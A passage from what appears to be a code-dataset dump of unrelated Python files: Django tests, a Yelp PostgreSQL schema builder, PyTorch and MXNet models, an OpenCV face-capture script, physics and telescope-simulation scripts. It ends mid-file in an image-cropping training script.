Story.objects.get(title='my_story')\n self.assertEqual(database_story.description, 'example_description')\n self.assertEqual(str(database_story.duration), '0:01:00')\n\n def test_delete_story(self):\n response = self.client.delete(self.detail_url)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertEqual(Story.objects.count(), 0)\n\n def test_update_story(self):\n response = self.client.put(\n self.detail_url,\n data=json.dumps(\n {\n 'title': 'new_title',\n 'description': 'new_description',\n 'duration': '01:00:00',\n 'points': [self.point.id],\n }\n ),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(Story.objects.count(), 1)\n database_story = Story.objects.get()\n self.assertEqual(database_story.title, 'new_title')\n self.assertEqual(database_story.description, 'new_description')\n self.assertEqual(str(database_story.duration), '1:00:00')\n\n def test_filter_story(self):\n first_point = PointFactory(geom=geos.fromstr('POINT (9 9)'))\n first_story = StoryFactory.create(first_point=first_point, points=(self.point,))\n list_url_with_filter = '{}?lat=10.00&long=10.00'.format(\n reverse('story-list')\n )\n response = self.client.get(list_url_with_filter, fromat='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n [first_story.id, self.story.id],\n [story['id'] for story in response.json()]\n )\n\n def test_filter_wrong_arguments(self):\n wrong_filter_url = '{}?lat=not_float&long=the_same'.format(\n reverse('story-list')\n )\n response = self.client.get(wrong_filter_url, fromat='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(\n response.json(),\n [WRONG_LAT_LONG_TEXT]\n )\n\n def test_get_all_points_for_story(self):\n url = reverse('story-points', kwargs={'pk': self.story.id})\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n response.json(),\n {\n 'features': [\n {\n 'properties': {\n 'images': [],\n 'description': self.point.description,\n 'title': self.point.title\n },\n 'geometry': {\n 'coordinates': [self.point.geom.x, self.point.geom.y], 'type': 'Point'\n },\n 'type': 'Feature'\n }\n ],\n 'type': 'FeatureCollection'\n }\n )\n","sub_path":"poznaj/stories/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"125349886","text":"from django.urls import path\nfrom . import views\n\nappname = 'blog'\n\nurlpatterns = [\n path('', views.index, name='blog_list'),\n path('detail/<int:id>', views.detail, name='blog_detail'),\n path('create/', views.create, name='blog_create'),\n path('update/<int:id>', views.update, name='blog_update'),\n path('delete/<int:id>', views.delete, name='blog_delete'),\n path('word_list', views.word_list, name='blog_word_list'),\n]","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"589412609","text":"import psycopg2\n\n\"\"\"\nTODO:\n\n1. Add error handling\n2. 
Add documentation\n\n\"\"\"\nclass YelpDBMaker:\n\n def __init__(self, conn, datafiles):\n self.conn = conn\n self.datafiles = datafiles\n\n def create(self):\n print('Drop existing tables...')\n self._drop_existing_tables()\n if 'business.json' in self.datafiles:\n self._create_business_table()\n if 'checkin.json' in self.datafiles:\n self._create_checkin_table()\n if 'review.json' in self.datafiles:\n self._create_review_table()\n if 'tip.json' in self.datafiles:\n self._create_tip_table()\n if 'user.json' in self.datafiles:\n self._create_user_table()\n\n def _drop_existing_tables(self):\n cur = self.conn.cursor()\n for datafile in self.datafiles:\n if datafile == 'user.json':\n datafile = 'user_info.json'\n try:\n print('Dropping table ' + datafile.split('.')[0].lower() + '...')\n cur.execute('DROP TABLE IF EXISTS ' + datafile.split('.')[0].lower() + ';')\n self.conn.commit()\n except psycopg2.Warning as warn:\n print(warn.pgerror)\n except psycopg2.Error as err:\n print(err.pgerror)\n self.conn.rollback()\n\n def _create_business_table(self):\n cur = self.conn.cursor()\n cur.execute(\"\"\"\n CREATE TABLE business(\n business_id char(22) PRIMARY KEY,\n name text,\n address text,\n city text,\n state text,\n postal_code text,\n lat real,\n long real,\n stars real,\n review_count integer,\n is_open boolean,\n attributes json,\n categories text,\n hours json\n );\n \"\"\")\n self.conn.commit()\n cur.close()\n\n def _create_review_table(self):\n cur = self.conn.cursor()\n cur.execute(\"\"\"\n CREATE TABLE review (\n review_id char(22) PRIMARY KEY,\n user_id char(22),\n business_id char(22),\n stars integer,\n review_date date,\n review_text text,\n useful integer,\n funny integer,\n cool integer\n );\n \"\"\")\n self.conn.commit()\n cur.close()\n\n def _create_user_table(self):\n cur = self.conn.cursor()\n cur.execute(\"\"\"\n CREATE TABLE user_info (\n user_id char(22) PRIMARY KEY,\n name text,\n review_count integer,\n yelping_since date,\n friends text,\n useful integer,\n funny integer,\n cool integer,\n fans integer,\n elite text,\n average_stars real,\n compliment_hot integer,\n compliment_more integer,\n compliment_profile integer,\n compliment_cute integer,\n compliment_list integer,\n compliment_note integer,\n compliment_plain integer,\n compliment_cool integer,\n compliment_funny integer,\n compliment_writer integer,\n compliment_photos integer\n );\n \"\"\")\n self.conn.commit()\n cur.close()\n\n def _create_tip_table(self):\n cur = self.conn.cursor()\n cur.execute(\"\"\"\n CREATE TABLE tip (\n tip_id serial PRIMARY KEY,\n tip_text text,\n tip_date date,\n compliment_count integer,\n business_id char(22),\n user_id char(22)\n );\n \"\"\")\n self.conn.commit()\n cur.close()\n\n def _create_checkin_table(self):\n cur = self.conn.cursor()\n cur.execute(\"\"\"\n CREATE TABLE checkin (\n checkin_id serial PRIMARY KEY,\n business_id char(22),\n dates text\n );\n \"\"\")\n self.conn.commit()\n cur.close()\n\nif __name__ == '__main__':\n pass\n","sub_path":"src/import/create_yelp_db.py","file_name":"create_yelp_db.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"559754445","text":"\"\"\" Network design \"\"\"\nimport torch\nimport torch.nn as nn\n\ndef kronCompact(a,idx=None):\n \"\"\"\n Kronecker product of matrices a and b with leading batch dimensions.\n Batch dimensions are broadcast. 
The number of them must match.\n    :type a: torch.Tensor\n    :rtype: torch.Tensor\n    \"\"\"\n    \n    if len(a.shape) > 3:\n        siz1 = torch.Size(torch.tensor(a.shape[-2:]) * torch.tensor(a.shape[-2:]))\n        res = a.unsqueeze(-1).unsqueeze(-3) * a.unsqueeze(-2).unsqueeze(-4)\n        siz0 = res.shape[:-4]\n        out = res.reshape(siz0 + siz1)\n    else:\n        a = a.unsqueeze(dim=1)\n        siz1 = torch.Size(torch.tensor(a.shape[-2:]) * torch.tensor(a.shape[-2:]))\n        res = a.unsqueeze(-1).unsqueeze(-3) * a.unsqueeze(-2).unsqueeze(-4)\n        siz0 = res.shape[:-4]\n        out = res.reshape(siz0 + siz1).squeeze(dim=1)\n    \n    if idx == None:\n        out1 = out\n    else:\n        out1 = out[:,idx]\n    return out1\n\n\n## Residual blocks\nclass ResidualBlock(nn.Module):\n    def __init__(self, in_features,activation = nn.GELU):\n        super(ResidualBlock, self).__init__()\n        self.activation = activation\n        \n        self.block = nn.Sequential(\n            nn.Linear(in_features, in_features),\n            self.activation(),\n            nn.Linear(in_features, in_features),\n        )\n        \n    def forward(self,x):\n        # return self.block(x)\n        return x + self.block(x)\n    \n## ResNet for nonlinear part \nclass nonlinear_part(nn.Module):\n    def __init__(self,n,num_residual_blocks,p=2,lb = True, activation = nn.GELU):\n        super(nonlinear_part,self).__init__()\n        self.activation = activation\n        model = [\n            nn.Linear(n, n*p),\n            # self.activation(),\n            # nn.Linear(n*p, n*p),\n        ]\n        \n        for _ in range(num_residual_blocks):\n            model += [ResidualBlock(n*p, activation = self.activation)]\n        \n        model += [\n            # nn.Linear(n*p, n*p),\n            # self.activation(),\n            nn.Linear(n*p, 1,bias = lb),\n        ]    \n        self.model = nn.Sequential(*model)\n        \n    def forward(self,x):\n        return self.model(x)\n    \n## Build models using only ResNet\nclass LQResNet(nn.Module):\n    def __init__(self, n,num_residual_blocks=4,p=1,nn_bias=True,activation = nn.GELU):\n        super(LQResNet,self).__init__()\n        self.activation = activation\n        \n        # self.idx = [i*n+j for i in range(n) for j in range(i,n)]\n        self.idx = [i for i in range(n**2)]\n        self.nq = len(self.idx)\n        \n        self.linear = nn.Linear(n,1)\n        self.quad = nn.Linear(self.nq,1,bias=False)\n        self.nonlinear = nonlinear_part(n,num_residual_blocks,p,activation = self.activation)\n        self.linear_out = nn.Linear(3,1)\n        \n    def forward(self,x):\n        xl = self.linear(x)\n        xq = self.quad(kronCompact(x))\n        xn = self.nonlinear(x)\n        xt = torch.cat((xl,xq,xn),dim=1)\n        return self.linear_out(xt)\n    \nclass model_DL_fully(nn.Module):\n    def __init__(self, n,num_residual_blocks=4,p=1,activation = nn.GELU):\n        super(model_DL_fully,self).__init__()\n        self.activation = activation\n        model = [\n            nn.Linear(n, n*p),\n            self.activation(),\n            nn.Linear(n*p, n*p),\n            self.activation(),\n            nn.Linear(n*p, n*p),\n            self.activation(),\n            nn.Linear(n*p, n*p),\n            self.activation(),\n            nn.Linear(n*p, n*p),\n            self.activation(),\n            nn.Linear(n*p, n*p),\n            self.activation(),\n            nn.Linear(n*p, 1),\n        ]\n        self.model = nn.Sequential(*model)\n    \n    def forward(self,x):\n        return self.model(x)    \n    \n    \n","sub_path":"Functions/architecture_design.py","file_name":"architecture_design.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"244605113","text":"import cv2\nimport numpy as np\n\n\n# Init Camera\ncamera = cv2.VideoCapture(0)\n\nface_detector = cv2.CascadeClassifier(\"FaceCascade/templatedata.xml\")\ndataset_path = \"./pics/\"\n\nface_data = []\ncnt = 0\n\nfilename = input(\"Enter name of person \")\nwhile True:\n    ret, img = camera.read()\n    if ret==False:\n        continue\n    \n    faces = 
face_detector.detectMultiScale(img,1.3,5)\n if(len(faces)==0):\n continue\n \n face=faces[0]\n x,y,w,h = face\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,200,0),5)\n cropped_img = img[y:y+h,x:x+w,:]\n cropped_img = cv2.resize(cropped_img,(100,100))\n cv2.imshow(\"Image\",img)\n cv2.imshow(\"Cropped Img\",cropped_img)\n cnt += 1\n if cnt%10==0:\n face_data.append(cropped_img)\n print(\"Pics clicked \",len(face_data))\n \n cv2.waitKey(1)\n if cnt==200:\n break\n \nface_data = np.asarray(face_data)\nprint(face_data.shape)\nnp.save(filename+\".npy\",face_data)\n \n \n \n ","sub_path":"DataCollect.py","file_name":"DataCollect.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"151580128","text":"#!/usr/bin/env python\n# vca.py\n#\n# Reads V(q) potential coefficients from file v_of_q.dat,\n# employs the virtual crystal approximation to compute\n# hybrid form factors, writes them to file vca_ff.dat.\n# The potential mixing is controlled by identifiers\n# host_material and doping_level.\n#\n# Georgy Samsonidze, UCB, 2011-02-06\n\nfrom sys import exit\nfrom math import pi, exp, pow\n\ntol = 1.0e-6\nbohr = 0.52917721092\n\nhost_material = 'Si'\ndoping_level = 0.05\n\ndef v_elemental_of_q(q, c):\n return c[0] * (q - c[1]) / (c[2] * exp(c[3] * q) - 1.0)\n\ndef v_binary_of_q(q, c):\n return c[0] * (q - c[1]) / (exp(c[2] * (q + c[3])) + 1.0)\n\ndef v_of_b(b, ca, cb):\n if abs(cb[0]) + abs(cb[1]) + abs(cb[2]) + abs(cb[3]) < tol:\n V3S = v_elemental_of_q(3.0 * b, ca)\n V8S = v_elemental_of_q(8.0 * b, ca)\n V11S = v_elemental_of_q(11.0 * b, ca)\n V3A = 0.0\n V4A = 0.0\n V11A = 0.0\n else:\n V3S = (v_binary_of_q(3.0 * b, ca) + v_binary_of_q(3.0 * b, cb)) / 2.0\n V8S = (v_binary_of_q(8.0 * b, ca) + v_binary_of_q(8.0 * b, cb)) / 2.0\n V11S = (v_binary_of_q(11.0 * b, ca) + v_binary_of_q(11.0 * b, cb)) / 2.0\n V3A = (v_binary_of_q(3.0 * b, ca) - v_binary_of_q(3.0 * b, cb)) / 2.0\n V4A = (v_binary_of_q(4.0 * b, ca) - v_binary_of_q(4.0 * b, cb)) / 2.0\n V11A = (v_binary_of_q(11.0 * b, ca) - v_binary_of_q(11.0 * b, cb)) / 2.0\n return [V3S, V8S, V11S], [V3A, V4A, V11A]\n\ndef mixff(hybrid_material, doping_level, host_a, host_ca, host_cb, dopant_a, dopant_ca, dopant_cb, da, dVS, dVA, hoff):\n #\n hybrid_a = pow((1 - doping_level) * pow(host_a, 3) + doping_level * pow(dopant_a, 3), 1.0/3.0)\n hybrid_b = pow(2.0 * pi * bohr / hybrid_a, 2)\n host_VS, host_VA = v_of_b(hybrid_b, host_ca, host_cb)\n dopant_VS, dopant_VA = v_of_b(hybrid_b, dopant_ca, dopant_cb)\n hybrid_VS = []\n hybrid_VA = []\n for i in xrange(3):\n hybrid_VS.append((1 - doping_level) * host_VS[i] + doping_level * dopant_VS[i])\n hybrid_VA.append((1 - doping_level) * host_VA[i] + doping_level * dopant_VA[i])\n #\n s = '%-9s %6.4f ' % (hybrid_material, hybrid_a)\n s += ' %8.5f %8.5f %8.5f' % (hybrid_VS[0], hybrid_VS[1], hybrid_VS[2])\n s += ' %8.5f %8.5f %8.5f' % (hybrid_VA[0], hybrid_VA[1], hybrid_VA[2])\n s += '\\n'\n hoff.write(s)\n #\n host_b = pow(2.0 * pi * bohr / host_a, 2)\n pure_VS, pure_VA = v_of_b(host_b, host_ca, host_cb)\n da.append(hybrid_a - host_a)\n for i in xrange(3):\n dVS[i].append(hybrid_VS[i] - pure_VS[i])\n dVA[i].append(hybrid_VA[i] - pure_VA[i])\n #\n\nhivq = open('v_of_q.dat', 'r')\nhoff = open('vca_ff.dat', 'w')\n\ns = hivq.readline()\nhoff.write(' a V3S V8S V11S V3A V4A V11A\\n')\n\ni = 0\nhost_index = -1\nmaterial = []\na = []\nca = []\ncb = []\nwhile 1:\n s = hivq.readline()\n if len(s) < 2:\n break\n t = s.split()\n if t[0] == 
host_material:\n        host_index = i\n    material.append(t[0])\n    a.append(float(t[1]))\n    ca.append([])\n    ca[i].append(float(t[2]))\n    ca[i].append(float(t[3]))\n    ca[i].append(float(t[4]))\n    ca[i].append(float(t[5]))\n    cb.append([])\n    cb[i].append(float(t[6]))\n    cb[i].append(float(t[7]))\n    cb[i].append(float(t[8]))\n    cb[i].append(float(t[9]))\n    i += 1\nif host_index == -1:\n    exit(\"\\n Error: invalid host material\\n\")  # only exit() is imported from sys above\n\nda = []\ndVS = [[], [], []]\ndVA = [[], [], []]\nfor dopant_index in xrange(len(material)):\n    if dopant_index == host_index:\n        continue\n    hybrid_material = '%s-%s' % (material[host_index], material[dopant_index])\n    mixff(hybrid_material, doping_level, a[host_index], ca[host_index], cb[host_index], a[dopant_index], ca[dopant_index], cb[dopant_index], da, dVS, dVA, hoff)\ns = 'minimum %7.4f ' % min(da)\ns += ' %8.5f %8.5f %8.5f' % (min(dVS[0]), min(dVS[1]), min(dVS[2]))\ns += ' %8.5f %8.5f %8.5f' % (min(dVA[0]), min(dVA[1]), min(dVA[2]))\ns += '\\n'\ns += 'maximum %7.4f ' % max(da)\ns += ' %8.5f %8.5f %8.5f' % (max(dVS[0]), max(dVS[1]), max(dVS[2]))\ns += ' %8.5f %8.5f %8.5f' % (max(dVA[0]), max(dVA[1]), max(dVA[2]))\ns += '\\n\\n'\ns += 'doping level = %.4f, minimum/maximum = deviation from pure material' % doping_level\ns += '\\n'\nhoff.write(s)\n\nhoff.write('\\n')\nhoff.write('a in Angstrom, VG^2S & VG^2A in Rydberg, G^2 in 2*pi/a\\n')\n\nhivq.close()\nhoff.close()\n","sub_path":"MeanField/EPM/vca.py","file_name":"vca.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"391127597","text":"import os\nimport argparse\nimport logging\nlogging.basicConfig(filename='./testlog/convnet_w1_b64_m.log', filemode=\"w\",level=logging.DEBUG)\n#logging.basicConfig(level=logging.DEBUG)\nfrom common import find_mxnet, data, fit\nfrom common.util import download_file\nimport mxnet as mx\n\ndef download_cifar10():\n    data_dir=\"data\"\n    fnames = (os.path.join(data_dir, \"cifar10_train.rec\"),\n              os.path.join(data_dir, \"cifar10_val.rec\"))\n    download_file('http://data.mxnet.io/data/cifar10/cifar10_val.rec', fnames[1])\n    download_file('http://data.mxnet.io/data/cifar10/cifar10_train.rec', fnames[0])\n    return fnames\n#added by mjc-----------------------start-------------------------------------------------\ndef get_convnet(num_classes = 10, force_mirroring=False):\n    data = mx.symbol.Variable('data')\n\n    conv1 = mx.symbol.Convolution(data=data, num_filter=32, kernel=(5, 5), pad=(2, 2))\n    pol1 = mx.symbol.Pooling(data=conv1, kernel=(3, 3), stride=(2, 2), pool_type='max')\n    act1 = mx.symbol.Activation(data = pol1, act_type='tanh')\n    \n    lrn1 = mx.symbol.LRN(data=act1, alpha=5e-05, beta=0.75, knorm=2, nsize=5)\n    \n    conv2 = mx.symbol.Convolution(data=lrn1, num_filter=32, kernel=(5, 5), pad=(2, 2))\n    act2 = mx.symbol.Activation(data = conv2, act_type='tanh')\n    pol2 = mx.symbol.Pooling(data=act2, kernel=(2, 2), stride=(2, 2), pool_type='avg')\n    \n    lrn2 = mx.symbol.LRN(data=pol2, alpha=5e-05, beta=0.75, knorm=2, nsize=5)\n    \n    conv3 = mx.symbol.Convolution(data=lrn2, num_filter=32, kernel=(5, 5), pad=(2, 2))\n    act3 = mx.symbol.Activation(data = conv3, act_type='tanh')\n    pol3 = mx.symbol.Pooling(data=act3, kernel=(3, 3), stride=(2, 2), pool_type='avg')\n    \n    flatten = mx.symbol.Flatten(data=pol3)\n\n    fc0 = mx.symbol.FullyConnected(data = flatten, name='fc0', num_hidden=64)\n    act3 = mx.symbol.Activation(data = fc0, act_type='tanh')\n\n    # conv3 = mx.symbol.Convolution(data=pol2, num_filter=64, kernel=(4, 4))\n    # 
act3 = mx.symbol.Activation(data = conv3, act_type='relu')\n\n fc1 = mx.symbol.FullyConnected(data = act3, name='fc1', num_hidden=64)\n act3 = mx.symbol.Activation(data = fc1, act_type='tanh') \n fc2 = mx.symbol.FullyConnected(data = act3, name='fc2', num_hidden=10) \n resnet = mx.symbol.SoftmaxOutput(data=fc2, name='softmax')\n return resnet \n \n#added by mjc-----------------------end-------------------------------------------------\nif __name__ == '__main__':\n \t# download data\n (train_fname, val_fname) = download_cifar10()\n\n # parse args\n parser = argparse.ArgumentParser(description=\"train cifar10\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n \n fit.add_fit_args(parser)\n data.add_data_args(parser)\n data.add_data_aug_args(parser)\n data.set_data_aug_level(parser, 2)\n \n net = get_convnet(10)\n\n parser.set_defaults(\n # network\n network = 'resnet',\n #num_layers = 110,\n # data\n data_train = train_fname,\n data_val = val_fname,\n num_classes = 10,\n num_examples = 50000,\n image_shape = '3,28,28',\n pad_size = 4,\n # train\n batch_size = 64,\n num_epochs = 300,\n disp_batches = 100,\n lr = .1,\n lr_step_epochs = '200,250',\n )\n \n args = parser.parse_args()\n\n # load network\n net = get_convnet(10)\n # train\n fit.fit(args, net, data.get_rec_iter)","sub_path":"Code_v1/cifar10_Net.py","file_name":"cifar10_Net.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"229592438","text":"from __future__ import division, print_function\nimport os\nimport qubic\nfrom qubicpack.utilities import Qubic_DataDir\nimport healpy as hp\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport sys\n\n\ndef select_det(q, id, multiband=True):\n id = [id]\n if multiband:\n for i in range(q.nsubbands ):\n detector_i = q[i].detector[id]\n q[i].detector = detector_i\n else:\n detector_i = q.detector[id]\n q.detector = detector_i\n return\n\n\nstokes = ['I', 'Q', 'U']\n\nmpl.style.use('classic')\nname = 'test_scan_source'\nresultDir = '%s' % name\nos.makedirs(resultDir, exist_ok=True)\n\nalaImager = True # if True, the beam will be a simple gaussian\ncomponent = 1 # Choose the component number to plot (IQU)\noneComponent = False # True if you want to study only I component, otherwise False if you study IQU\nsel_det = True # True if you want to use one detector, False if you want to use all detectors in focal plane\nid_det = 4 # if sel_det == True, choose detector number\nmultiband = True # True if you want to use a multiband instrument and make TOD with a MultibandAcquisition\n\n# Dictionnary\nglobal_dir = Qubic_DataDir(datafile='instrument.py', datadir=os.environ['QUBIC_DATADIR'])\nprint('global_dir: ', global_dir)\nd = qubic.qubicdict.qubicDict()\nd.read_from_file(global_dir + '/dicts/global_source_oneDet.dict')\n\n# Scene\ns = qubic.QubicScene(d)\n\n# Instrument\nif multiband:\n q = qubic.QubicMultibandInstrument(d)\nelse:\n q = qubic.QubicInstrument(d)\nif sel_det:\n select_det(q, id_det, multiband=multiband)\n\n# Pointing\np = qubic.get_pointing(d)\n\nfix_azimuth = d['fix_azimuth']\nprint('fix_azimuth', fix_azimuth)\n\nplt.figure(figsize=(12, 8))\nplt.subplot(411)\nplt.plot(p.time, p.azimuth, 'bo')\nplt.ylabel('Azimuth')\nplt.subplot(412)\nplt.plot(p.time, p.elevation, 'bo')\nplt.ylabel('Elevation')\nplt.subplot(413)\nplt.plot(p.time, p.pitch, 'bo')\nplt.ylabel('pitch angle')\nplt.subplot(414)\nplt.plot(p.time, p.angle_hwp, 'bo')\nplt.ylabel('HWP 
angle')\nplt.savefig(resultDir+'/%s_pointing.png'%name, bbox_inches='tight')\n\n# Make a point source\nm0 = np.zeros(12 * d['nside'] ** 2)\nx0 = np.zeros((d['nf_sub'], len(m0), 3))\nid = hp.pixelfunc.ang2pix(d['nside'], fix_azimuth['el'], fix_azimuth['az'],\n lonlat=True)\nsource = m0 * 0\nsource[id] = 1\narcToRad = np.pi / (180 * 60.)\nsource = hp.sphtfunc.smoothing(source, fwhm=30 * arcToRad)\nx0[:, :, component] = source\nhp.mollview(x0[0, :, component])\nplt.show()\n\nif p.fix_az:\n center = (fix_azimuth['az'], fix_azimuth['el'])\nelse:\n center = qubic.equ2gal(d['RA_center'], d['DEC_center'])\n\n# Make TOD\nif multiband:\n Nbfreq_in, nus_edge_in, nus_in, deltas_in, Delta_in, Nbbands_in = qubic.compute_freq(d['filter_nu'] / 1e9,\n d['nf_sub'],\n d['filter_relative_bandwidth'])\n a = qubic.QubicMultibandAcquisition(q, p, s, d, nus_edge_in)\nelse:\n a = qubic.QubicAcquisition(q, p, s, d)\nTOD = a.get_observation(x0, noiseless=True, convolution=False)\n\nplt.plot(TOD[0, :])\nplt.xlabel('pointing index')\nplt.ylabel('TOD')\nplt.show()\n\n# Map making\nif alaImager:\n nf_sub_rec = 1\n d['synthbeam_kmax'] = 0\n if oneComponent:\n d['kind'] = 'I'\n q = qubic.QubicInstrument(d)\n if sel_det:\n select_det(q, id_det, multiband=False)\n arec = qubic.QubicAcquisition(q, p, s, d)\nelse:\n nf_sub_rec = 2\n Nbfreq, nus_edge, nus, deltas, Delta, Nbbands = qubic.compute_freq(d['filter_nu'] / 1e9,\n nf_sub_rec,\n d['filter_relative_bandwidth'])\n\n arec = qubic.QubicMultibandAcquisition(q, p, s, d, nus_edge)\n\nmaps_recon, nit, error = arec.tod2map(TOD, d, cov=None)\nhp.gnomview(maps_recon[:, component], rot=center, reso=15)\nprint(maps_recon.shape)\n\n# Coverage\ncov = arec.get_coverage()\nhp.gnomview(cov, rot=center, reso=15)\ncov = np.sum(cov, axis=0)\nmaxcov = np.max(cov)\nunseen = cov < maxcov * 0.1\n\n# Convolved maps\nTOD_useless, maps_convolved = arec.get_observation(x0)\nmaps_convolved = np.array(maps_convolved)\n\ndiffmap = maps_convolved - maps_recon\nmaps_convolved[:, unseen, :] = hp.UNSEEN\nmaps_recon[:, unseen, :] = hp.UNSEEN\ndiffmap[:, unseen, :] = hp.UNSEEN\n\nxname = ''\nif alaImager == True:\n nf_sub_rec = 1\n xname = 'alaImager'\n\nfor istokes in [0, 1, 2]:\n plt.figure(istokes, figsize=(12, 12))\n xr = 0.1 * np.max(maps_recon[0, :, 0])\n for i in range(nf_sub_rec):\n im_in = hp.gnomview(maps_convolved[i, :, istokes], rot=center, reso=5, sub=(nf_sub_rec, 2, 2 * i + 1), min=-xr,\n max=xr, title='Input ' + stokes[istokes] + ' SubFreq {}'.format(i),\n return_projected_map=True)\n np.savetxt(resultDir + '/in_%s_%s_subfreq_%d_%s.dat' % (name, stokes[istokes], i, xname), im_in)\n im_old = hp.gnomview(maps_recon[i, :, istokes], rot=center, reso=5, sub=(nf_sub_rec, 2, 2 * i + 2), min=-xr,\n max=xr, title='Output ' + stokes[istokes] + ' SubFreq {}'.format(i),\n return_projected_map=True)\n np.savetxt(resultDir + '/out_%s_%s_subfreq_%d_%s.dat' % (name, stokes[istokes], i, xname), im_old)\n\n plt.savefig(resultDir + '/%s_map_%s_%s.png' % (name, stokes[istokes], xname), bbox_inches='tight')\n plt.clf()\n plt.close()\n\nplt.figure(figsize=(15,8))\ncount = 1\n\nif d['kind'] == 'I':\n xr = 0.01 * np.max(maps_recon[:])\n im_old = hp.gnomview(maps_recon[:], rot=center, reso=5, min=-xr, max=xr, title='Output ', return_projected_map=True,\n hold=True, xsize=500)\n plt.show()\nelse:\n for istokes in range(3):\n plt.subplot(1, 3, count)\n xr = 0.009\n im_old = hp.gnomview(maps_recon[0, :, istokes], xsize=500, rot=center, reso=5, min=-xr, max=xr,\n title='Output ' + stokes[istokes], 
return_projected_map=True, hold=True)\n count += 1\n plt.show()\n\n P = np.sqrt(maps_recon[:, 1] ** 2 + maps_recon[:, 2] ** 2)\n\n plt.figure(figsize=(15, 8))\n\n plt.subplot(1, 2, 1)\n hp.gnomview(P, xsize=500, rot=center, reso=5, title='Output P', return_projected_map=True, hold=True)\n plt.subplot(1, 2, 2)\n hp.gnomview(sb, rot=[0, 90], xsize=500, reso=5, title='Input ', return_projected_map=True, hold=True)\n plt.show()\n","sub_path":"qubic/doc/scanSource.py","file_name":"scanSource.py","file_ext":"py","file_size_in_byte":6569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"88965438","text":"#!/usr/bin/python3\n\nfrom multiprocessing import Pool\nimport time\nimport numpy as np\nimport pandas as pd\n\ndef f(x):\n return x*x\n\nif __name__ == '__main__':\n val = int(1e6)\n \n t1 = time.time()\n with Pool(4) as p:\n p.map(f, range(val))\n t2 = time.time()\n print(t2-t1)\n\n t3 = time.time()\n [ f(el) for el in range(val) ]\n t4 = time.time()\n print(t4-t3)\n\n t5 = time.time()\n x = pd.DataFrame(np.arange(int(1e6)),columns=['x'])\n fx = x.apply(f)\n t6 = time.time()\n print(t6-t5)\n\n t7 = time.time()\n fvec = np.vectorize(f)\n res = fvec(range(val))\n t8 = time.time()\n print(t8-t7)\n \n \n\n \n","sub_path":"multiproc.py","file_name":"multiproc.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"107944654","text":"from tensorflow.keras.applications import MobileNet\nfrom tensorflow.keras.applications.mobilenet import preprocess_input\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\n\nimport tensorflow as tf\nimport sys\nold_stderr = sys.stderr\nsys.stderr = open('/dev/null', 'w')\nimport keras\nsys.stderr = old_stderr\n\n### train the model_pretrain of crapping\n\nfrom PIL import Image as pil_image\nfrom PIL.ImageDraw import Draw\nfrom os.path import isfile\n\n# def expand_path(p):\n# if isfile('../input/whale-categorization-playground/train/' + p): return '../input/whale-categorization-playground/train/' + p\n# if isfile('../input/whale-categorization-playground/test/' + p): return '../input/whale-categorization-playground/test/' + p\n# return p\n\ndef read_raw_image(p):\n return pil_image.open(p)\n#\n# def draw_dot(draw, x, y):\n# draw.ellipse(((x-5,y-5),(x+5,y+5)), fill='red', outline='red')\n#\n# def draw_dots(draw, coordinates):\n# for x,y in coordinates: draw_dot(draw, x, y)\n#\n# def bounding_rectangle(list):\n# x0, y0 = list[0]\n# x1, y1 = x0, y0\n# for x,y in list[1:]:\n# x0 = min(x0, x)\n# y0 = min(y0, y)\n# x1 = max(x1, x)\n# y1 = max(y1, y)\n# return x0,y0,x1,y1\n#\n# filename,coordinates = data[0]\n# box = bounding_rectangle(coordinates)\n# img = read_raw_image(filename)\n# draw = Draw(img)\n# draw_dots(draw, coordinates)\n# draw.rectangle(box, outline='red')\n# img\n\n######################\n### train the model_pretrain\n######################\nimg_shape = (128,128,1)\nanisotropy = 2.15\n\nimport random\nimport numpy as np\nfrom scipy.ndimage import affine_transform\nfrom keras.preprocessing.image import img_to_array\n\n# Read an image as black&white numpy array\ndef read_array(p):\n img = read_raw_image(p).convert('L')\n return img_to_array(img)\n\ndef build_transform(rotation, shear, height_zoom, width_zoom, height_shift, width_shift):\n rotation = np.deg2rad(rotation)\n shear = np.deg2rad(shear)\n rotation_matrix = np.array([[np.cos(rotation), np.sin(rotation), 0], [-np.sin(rotation), 
